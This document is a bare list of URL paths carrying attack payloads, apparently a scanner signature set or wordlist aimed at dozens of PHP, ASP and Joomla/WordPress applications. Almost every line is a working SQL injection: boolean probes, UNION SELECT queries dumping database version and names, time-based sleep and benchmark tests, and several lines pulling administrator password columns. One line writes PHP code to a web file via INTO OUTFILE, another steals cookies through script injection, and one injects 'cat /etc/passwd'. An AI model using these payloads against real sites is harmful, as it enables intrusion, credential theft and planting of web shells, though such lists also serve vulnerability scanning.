/investcalc.php?price=1&projid=1%20and%201=1
/list?city=1%20and%201=1&main_search=
/lawyer-list?city=1%20and%201=1&main_search=
/exams.php?sort=1%20and%201=1
/single_detail.php?sid=1%20and%201=1::/www/category.php?searchcat=1%20and%201=1::/www/category.php?chid1=1%20and%201=1
/service-list?city=1%20and%201=1&main_search=
/categories?subctid=1%20and%201=1::/www/categories?&mctid=1%20and%201=1
/property-list?tbud=5001-100001%20and%201=1&quicksrch1=
/category.php?searchmain=1%20and%201=1&searchcat=1%20and%201=1::/www/single_detail.php?sid=1%20and%201=1
/list?city=1%20and%201=1&main_search=
/success-story.php?succid=1%20and%201=1
/findcity.php?q=1%20and%201=1
/trailer-detail.php?moid=1%20and%201=1::/www/show-time.php?moid=1%20and%201=1::/www/event-detail.php?eid=1%20and%201=1
/findcity.php?q=1%20and%201=1
/news_detail.php?newid=1%20and%201=1::/www/event_detail.php?eventid=1%20and%201=1
/news-detail.php?newid=1%20and%201=1
/countrycode1.php?val=1%20and%201=1
/city_ajax.php?state_id=1%20and%201=1::/www/category_list.php?search=1%20and%201=1
/success-story.php?succid=1%20and%201=1
/city.php?country=1%20and%201=1&state=1%20and%201=1::/www/state.php?country=1%20and%201=1
/preview.php?id=1%20and%201=1
/search_result.php?marital=1%20and%201=1&submit::/www/search_result.php?gender=1%20and%201=1&submit::/www/search_result.php?country=1%20and%201=1&submit::/www/search_result.php?profileid=1%20and%201=1&submit
/admin/userview.php?uid=1%20and%201=1::/www/admin/viewemcamp.php?fnum=1%20and%201=1::/www/admin/viewvisitcamp.php?fn=1%20and%201=1
/index.php?option=com_jbuildozer&view=entriessearch&tmpl=component&mode=module&tpl=3&appid=1%20and%201=1
/index.php/en/component/jequestions/?view=tags&an=1%20and%201=1
/index.php?option=com_jevideogallery&view=category&id=991%20and%201=1
/index.php?option=com_jefaqpro&view=category&id=1%20and%201=1&Itemid=494
/videosharing/search_video.php?search=123::/www/videosharing/viewsubs.php?chnlid=321
/ajax.php?p=video&do=getplayer&vid=randomid&aid=1&player=detail&playlist=1%20and%201=1
/event.php?event_id=-123%20union%20all%20select%201,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
/index.php?option=com_adagency&controller=adagencyAdvertisers&advertiser_status=-1%27and%20SELECT%20*%20FROM%20table1--::/index.php?option=com_adagency&controller=adagencyAds&status_select=Y-1%27%20%and%20SELECT%20*%20FROM%20table4**&camp_id=3
/listing?keywords=1%20and%201=1&location=All%20United%20States&placetype=country&placeid=2311%20and%201=1&cat=1%20and%201=1&subcat=51%20and%201=1&filter=&sort=Newest&Submit='%20UNION%20ALL%20SELECT%20NULL,CONCAT(version(),0x7e7e,database()),NULL--%20gLLf
/search/?q=&price_type=range&price=1%20and%201=1
/livecrm/web/index.php?r=site/login&company_id=1%20and%201=1
/site_search.php?s_vehicletype=auto&s_order=1%20and%201=1&s_row=1%20and%201=1
/index.php?id=1%20and%201=1::/www/mobile_preview.php?id=1%20and%201=1
/sellers_subcategories.php?IndustryID=1%20and%201=1::/www/suppliers.php?IndustryID=1%20and%201=1&CategoryID=1%20and%201=1
/pages/single_blog.php?id=1%20and%201=1
/product-list.php?srch=1%20and%201=1
/site.php?id=1%20and%201=1::/www/pagelist.php?id=1%20and%201=1::/www/page_new.php?id=1%20and%201=1
/chat_im/chat_window.php?request_id=1%20and%201=1::/www/search_events.php?category=1%20and%201=1
/index.php?option=com_visualcalendar&view=load&id=1%20and%201=1
/index.php?option=com_cpeventcalendar&task=load&id=1%20and%201=1
/index.php?option=com_jeclassifieds&view=boutique&sid=1%20and%201=1
/event.php?id=1%20and%201=1::/www/page.php?slug=1%20and%201=1
/index.php?option=com_jereverseauction&view=products&layout=default_message&tmpl=component&id=1%20and%201=1&uid=1
/index.php?option=com_jmsmusic&view=search&keyword=1%20and%201=1::/www/index.php?option=com_jmsmusic&view=search&artist=1%20and%201=1::/www/index.php?option=com_jmsmusic&view=search&username=1%20and%201=1
/index.php?option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=1%20and%201=1::/www/index.php?option=com_jsptickets&controller=statuslist&task=edit&id=1%20and%201=1::/www/index.php?option=com_jsptickets&controller=prioritylist&task=edit&id=1%20and%201=1
/index.php?option=com_jgive&view=campaigns&layout=all&filter_org_ind_type=1%20and%201=1::/www/index.php/more/campaigns-in-pin-display/campaigns/all/search/:?campaign_countries=1%20and%201=1
/component/smartshoutbox/archive?shoutauthor=1%20and%201=1
/index.php?option=com_gallery_wd&tag_id=&view=GalleryBox&gallery_id=71%20and%201=1::/www/index.php?option=com_gallery_wd&tag_id=1%20and%201=1&view=GalleryBox&gallery_id=7
/index.php?option=com_advertisementboard&Itemid=132&task=show_rss_categories&catname=1%20and%201=1
/index.php?option=com_jquickcontact&task=refresh&sid=1%20and%201=1
/index.php?option=com_ccnewsletter&task=removeSubscriber&id=1%20and%201=1
/index.php?option=com_avreloaded&view=popup&Itemid=55&divid=1%20and%201=1
/index.php?option=com_formmaker&view=stats&id=1%20and%201=1::/www/index.php?option=com_formmaker&view=stats&form_id=1&id=1&from=1%20and%201=1::/www/index.php?option=com_formmaker&view=stats&form_id=1&id=1&to=1%20and%201=1
/index.php?option=com_staffmaster&view=staff&name=1%20and%201=1
/index.php?option=com_aist&view=showvacancy&id=1%20and%201=1
/index.php/component/jsjobs/newest-jobs?zipcode=1%20and%201=1&option=com_jsjobs&task11=view::/www/index.php?option=com_jsjobs&c=resume&view=resume&layout=view_resume&bd=1&sortby=1&ta=1%20and%201=1
/index.php?option=com_realpin&pinboard=1%20and%201=1
/index.php?option=com_jsautoz&c=vehicle&view=vehicle&layout=listvehicles&vtype=1%20and%201=1::/www/index.php?option=com_jsautoz&c=vehicle&view=vehicle&layout=listvehicles&pre=1%20and%201=1::/www/index.php?option=com_jsautoz&c=vehicle&view=vehicle&layout=listvehicles&prs=1%20and%201=1
/index.php?option=com_jomestate&task=detailed&id=1%20and%201=1
/index.php?option=com_bookpro&view=orderdetail&order_number=1%20and%201=1
/index.php?option=com_fastball&view=player&season=1%20and%201=1
/index.php?option=com_invitex&view=invites&invite_type=1%20and%201=1&invite_anywhere=1
/index.php?option=com_gmap&view=gm_markers&tmpl=component&layout=form_markers&cid=1%20and%201=1&id=1&format=raw::/www/index.php?option=com_gmap&view=gm_markers&tmpl=component&layout=form_markers&cid=1&id=1%20and%201=1&format=raw::/www/index.php?option=com_gmap&view=gm_modal&tmpl=component&layout=default&map=1%20and%201=1
/index.php?option=com_timetable&view=event&alias=1%20and%201=1
/index.php?option=com_dtregister&task=edit&controller=category&id=1%20and%201=1
/index.php?option=com_jticketing&view=events&layout=all&filter_creator=1%20and%201=1::/www/index.php?option=com_jticketing&view=events&layout=all&filter_events_cat=1%20and%201=1
/index.php?option=com_saxumnumerology&view=savedresult&publicid=1%20and%201=1
/index.php?option=com_saxumpicker&view=savedspread&publicid=1%20and%201=1
/index.php?option=com_squadmanagement&task=removewarround&id=1%20and%201=1::/www/index.php?option=com_squadmanagement&controller=appointment&task=deleteappointment&id=1%20and%201=1::/www/index.php?option=com_squadmanagement&controller=appointment&task=removefromappointment&id=1%20and%201=1::/www/index.php?option=com_squadmanagement&view=editsquad&format=memberlist&squadid=1%20and%201=1::/www/index.php?option=com_squadmanagement&controller=squadmembers&task=addmember&squadid=1%20and%201=1
/index.php?option=com_saxumastro&view=savedreading&publicid=1%20and%201=1
/index.php?option=com_projectlog&view=cat&search=1%20and%201=1
/index.php?option=com_abook&view=category&letter=1%20and%201=1
/index.php?option=com_prayercenter&task=confirm&id=1&sessionid=1%20and%201=1
/index.php/component/ekrishta/alluser?options=com_ekrishta&view=alluser&gender=1%20and%201=1&age1=1%20and%201=1&age2=1%20and%201=1&religion=1%20and%201=1&mothertounge=1%20and%201=1&caste=1%20and%201=1&country=1%20and%201=1
/index.php?option=com_checklist&view=frontend&title_search=1%20and%201=1&tag_search=1%20and%201=1&name_search=1%20and%201=1&description_search=1%20and%201=1&filter_order=1%20and%201=1
/os-property-layouts/search-tools/advanced-search?&option=com_osproperty&task=property_advsearch&cooling_system1=1%20and%201=1&heating_system1=1%20and%201=1&laundry=1%20and%201=1
/jobs.php?status=0&level_id=&client_id=0&start_time=&end_time=&orderby=jobid&jobs_per_page=25&pool_id=11%27%20UNION%20ALL%20SELECT%20@@version%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23::/client-report.php?period=7&client_id=21%20UNION%20ALL%20SELECT%20NULL,@@version%23
/editDisplaynames.do?method=editDisplaynames&resids=1)%20AND%202410=2410%20AND%20(5744=5744
/mobile-loja/mensagem.asp?msgid=0&msgstr=Venda%20on-line%20encerrada.%20Adquira%20seu%20ingresso%20nos%20pontos%20oficiais%20ou%20na%20bilheteria%20do%20evento.&eve_cod=1%20and%201=1
/module/admin_bp/php/function_bp.php?action=list_process&bp_name=&display=%27or%271%27=%271::/module/admin_bp/php/function_bp.php?action=list_process&bp_name=%27or%271%27=%271&display=1::/module/monitoring_ged/ajax.php?queue=active&type=1%27+AND+(SELECT+sleep(5))+AND+%271%27=%271&owner=&filter=equipment&search=&ok=on&warning=on&critical=on&unknown=on&daterange=&time_period=&ack_time=::/module/monitoring_ged/ajax.php?queue=active&type=1&owner=&filter=equipment&search='+AND+(select+sleep(5))+AND+'1'='1&ok=on&warning=on&critical=on&unknown=on&daterange=&time_period=&ack_time=::/module/monitoring_ged/ged_actions.php?action=advancedFilterSearch&filter=(select+user_passwd+from+eonweb.users+limit%201)&queue=history
/centreon/include/common/XmlTree/GetXmlTree.php?sid=%27%2Bif(1%3C2,sleep(1),%27%27)%2B%27
/user_contacts.php?user=0%27%20UNION%20SELECT%201,2,3,version%28%29,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10%20--%202::/view_channel.php?user=0%27%20UNION%20SELECT%201,2,3,version%28%29,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10%20--%202::/view_page.php?pid=0%27%20UNION%20SELECT%201,2,3,4,5,version%28%29,7,8,9,10%20--%202::/view_topic.php?tid=0%27%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9,10,11,12%20--%202
/index.php?action=attachment&file_name=%27::/index%20.php?action=show_comment%20&post=%27::/index.php?action=rssfeed&type=entry&sys-name=%27::/index.php?action=view&sys-name=%27
/1.2.0/product/search?search_query=1%20and%201=1
/admin/stats_monthly_sales.php?status=%27%3Cscript%3Ealert%28do%20cument.cookie%29;%3C/script%3E::/admin/stats_monthly_sales.php?status=0%20union%20select%20'<?%20php_code%20?>'%20INTO%20OUTFILE%20'../../../path/to/site/file.php'
/admin/?do=disporders&action=detail&id=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,database%28%29,34,35,version%28%29,37,38+--+::/admin/?do=editcurrency&cid=1+and+1=2+union+select+1,database%28%29,3,version%28%29,5+--+::/admin/?do=subadminmgt&action=edit&id=1+and+1=2+union+select+1,version%28%29,3,database%28%29,5+--+
/jclassifiedsmanager/classifieds/offerring-ads?controller=displayads&view=displayads&task=viewad&id=1%20and%20SELECT%20*%20FROM%20table1
/ecommercemajor/product.php?productbycat=1%20and%201=1
/index.php?act=category&cid=1%20and%201=1
/admin.php?type=site&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+::/admin.php?type=customkey&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,4+--+::/admin.php?type=account&action=update&p=1+and+1=2+union+select+1,database%28%29,3,4,5,version%28%29,7,8,9+--+::/admin.php?type=plugin&action=update&p=1+and+1=2+union+select+1,database%28%29,version%28%29,4+--+::/admin.php?type=template&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,user%28%29,5+--+::/admin.php?type=permissiongroup&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+::/admin.php?type=page&action=update&p=1+and+substring%28version%28%29,1,1%29=5+--+
/app?i=1+union+all+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
/script/load-calendar.php?view=1&month=6&year=2013&cid=1cat%20/etc/passwd::/script/load-calendar.php?cid=1cat%20/etc/passwd::/script/load-calendar.php?view=1&month=6&year=2013&cid=1+and+1=1::/script/load-calendar.php?view=1&month=6&year=2013&cid=1+and+1=2::/script/load-calendar.php?view=1&month=6&year=2013&cid=1+and+substring(@@version,1,1)=5::/script/load-calendar.php?view=1&month=6&year=2013&cid=1+and+substring(@@version,1,1)=4
/?ym_download_id=1%20and%201=1
/backend/main.php?area=con_configcat&idcat=1&idtplconf=0::/backend/main.php?area=plug&idclient=1
/wp-admin/admin-ajax.php/?srch_txt='or%201=1--%20&action=the_search_text
/path/showads.php?catid=1%20and%201=1
/cgi/client.cgi?act=list_zone&group_id=11%20and%201=1
/admin/pages/modify.php?page_id=11%20and%201=1
/wp-admin/admin-ajax.php?action=myextractXML&vid=1::/wp-admin/admin.php?page=newplaylist&playlistId=1::/wp-admin/admin.php?page=newvideo&videoId=1
/bacula-web/joblogs.php?jobid=991%20and%201=1
/jobs/?tx_dmmjobcontrol_pi1%5Bsearch_submit%5D=Search&tx_dmmjobcontrol_pi1%5Bsearch%5D%5Bsector%5D%5B%5D=3%29and%20benchmark%2820000000%2csha1%281%29%29--%20
/wp-admin/admin.php?page=wrp-add-new&id=2%20union%20select%201,user(),database(),4,5,6,7,8,9,10,11,12,13,14,15,@@version,17,18
/acms/admin/uploads.php?id=1%20and(select%201%20FROM(select%20%20count(*),concat((select%20(select%20concat(database()))%20FROM%20%20information_schema.tables%20LIMIT%200,1),floor(rand(0)*2))x%20FROM%20%20information_schema.tables%20GROUP%20BY%20x)a)
/FoeCMS/index.php?i=1%20and%201=1
/ads.php?catid=4%27a1%20and%201=1
/categories-x.php?getcategories&sortkey=name)%20limit%201;--::/categories-x.php?getcategories&sortkey=name)%20limit%205;--
/videocat.php?url=test'%20AND%203383=3383%20AND%20'Odau'='Odau::/single.php?url=test'%20AND%203383=3383%20AND%20'Odau'='Odau
/modules/glossaire/glossaire-aff.php?lettre=A%20%and%20SELECT%20*%20FROM%20table1
/costview2/jobs.php?tr=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,pass_adm,14,15,16+from+cost_admin::/costview2/printers.php?id_onglet=0&tr=0+union+select+0x3020756E696F6E2073656C656374206E756C6C2C404076657273696F6E2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C,null,null,0,null&deb=0
/site/default.asp?TroncoID=1%20and%201=1
/desktopmodules/dnnarticle/dnnarticlerss.aspx?moduleid=0&categoryid=1+or+1=@@version
/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,versi%20on%28%29,3,4,5,6,7,8,9
/download.php?category=1%20and%201=1
